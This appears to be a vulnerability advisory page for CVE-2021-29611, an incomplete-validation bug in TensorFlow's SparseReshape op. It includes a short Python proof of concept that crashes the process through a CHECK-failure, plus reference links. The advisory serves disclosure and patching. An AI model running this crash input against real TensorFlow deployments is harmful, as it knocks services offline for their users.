CVE-2021-29611: Incomplete validation in `SparseReshape`
(updated )
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure.
import tensorflow as tf
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)
tf.raw_ops.SparseReshape(input_indices=input_indices,
input_shape=input_shape,
new_shape=new_shape)
References
- github.com/advisories/GHSA-9rpc-5v9q-5r7f
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-539.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-737.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-248.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6
- github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7f
- nvd.nist.gov/vuln/detail/CVE-2021-29611
Detect and mitigate CVE-2021-29611 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →